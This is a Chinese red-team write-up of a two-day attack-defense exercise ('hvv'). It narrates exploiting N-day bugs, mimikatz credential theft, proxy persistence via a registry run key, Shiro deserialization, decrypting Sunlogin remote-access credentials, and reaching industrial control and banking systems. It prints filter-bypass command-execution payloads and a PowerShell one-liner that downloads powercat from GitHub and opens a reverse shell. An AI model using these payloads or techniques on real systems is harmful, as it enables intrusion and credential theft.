一次(不)优雅的虚假hvv

  由于种种原因，本次项目留给我们的时间只有两天，在人力不足且时间短的情况下（且不影响正常作息以及干饭），如何利用两天时间取得最大的成果是我们需要解决的。

在一次正经的红队评估前期我们需要准备

1-N台VPS teamserver（域前置、邮件前置、C2前置）

CobaltStrike、Tower协同 

养域名，抢注⾼可信域名，域名⽩名单

SMTP、Gophish 免杀⻢（office宏、LNK⽂件钓⻥、⽩加⿊)、话术等等。

然而

本次项目由于时间以及个人因素（菜），可能需要采取特殊的手段。首先，我们决定在目标选择上优先选择手里有1/Nday的系统，其次在未退场参演单位中，优先选择其子公司、孙公司、重孙公司资产进行打点，最后，如果突破口子太少，直接近源手段利用人性的缺陷进而获取我们所需要的。接下来就是详细过程……

第一天在参演单位靶标中看到了熟悉的老朋友，并且确定该系统暴露外网（福利局）

直接掏出day就干，很幸运在入场第三分钟拿到了第一个shell

测试出网，随后直接上传iox搭建代理，这里发现管理员不在线因此直接猕猴桃抓密码上线，防止被顶掉直接配置注册表自启动iox

HKEY_LOCAL_MACHINESOFTWAREMicroftwindowscurrentversionrun

工作组下直接简单横向探测了一下发现C段存活IP很少且只有当前机器 （OA服务器）开放自用3306和一个智能网关两个打印机。随后发现这个网关表明这个内网并不简单。

扫描该机器发现存在smb弱口令，上线CS 土豆提权

接下来到重点了，这是一台运维机，什么是运维机？如图

工控

接下来懂的都懂，历时25分钟，出局第一家，靶标分+路径分刷满

在截图的同时，发现场上某单位丢了一千多分，猜测是一个内网隔离分，于是让队友看了下该单位，shiro反序列化，搭建代理直接突破内网，tasklist发现有向日葵运行，有杀软

上了个CS没啥大用，解向日葵，很尴尬周末网管不上班，如图

解密如下

脚本开源

感觉继续看这个内网价值不大为了利益最大化选择近源/重孙公司，主要因为懒所以还是盯上了某家从未丢分企业，确实大，且防护产品到位，于是对该机器B段扫描提取title调用埃文科技IP定位接口发现该B段存在某友OA且出口IP为该企业附近（这个过程完全可以工具化）屡试不爽。

埃文定位https://www.chaipip.com/aiwen.html(有广告费吗)

某友的产品相信网友懂得都懂，自古不自动更新，能成功的机率很大，于是掏出了被某云厂商捕获的我们的day直接一把梭。这里有点小问题。

首先其实某友的这个漏洞跟泛微的Beanshell调用类似，都是接口未授权

在实际应用上，网上给的绕过手法很多了

eval%00("ex"%2b"ec("whoami")");

exu0065c("cmd /c dir");

IEX(New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ip -p 6666 -e cmd

这里是直接certutil下载远程base64的powershell脚本解码生成新文件

后续内网渗透发现重要系统，省去中间怼漏洞发现域控的过程基本上其实已经刷满了

确实有钱。

银企服务器发现银行密码本以及网银助手

好家伙10张卡直接财富自由（胡说）

后续内网撞工控，1279，横向渗透的过程忽略

由于前期在这个内网浪费时间最后只剩半天时间，恰好又发现某家单位某个Web应用的漏洞，运气好，黑盒挖了个通用命令执行。由于不出网挂正向代理，在刷内网的时候卡住了，感觉内网应该很大，但是打不出东西，随后队友在某个我忽略到的地方发现重要FTP以及提取某台机器的微信文件发现某截图。

真正的运维往往都是记不住密码的（好运维）

利用VPN手里的密码本以及拓扑图打完了全网 至此收工。

总结一下，在内网中你收集到的信息越多，你能获取的价值就会越高，因此，内网渗透不能放掉每一个点，每一台机器尽量“榨干”之后再去进一步渗透。因为这次项目时间很短，所以我称他为不优雅的渗透过程，整个过程显得很粗糙，有很多细节的地方没有考虑到，再就是在最后一个域上边浪费的时间过多，导致后期时间不够。总之，这次"闪电战"还是学到了很多，希望大家一起进步。

听说转发七夕抽奖送女朋友？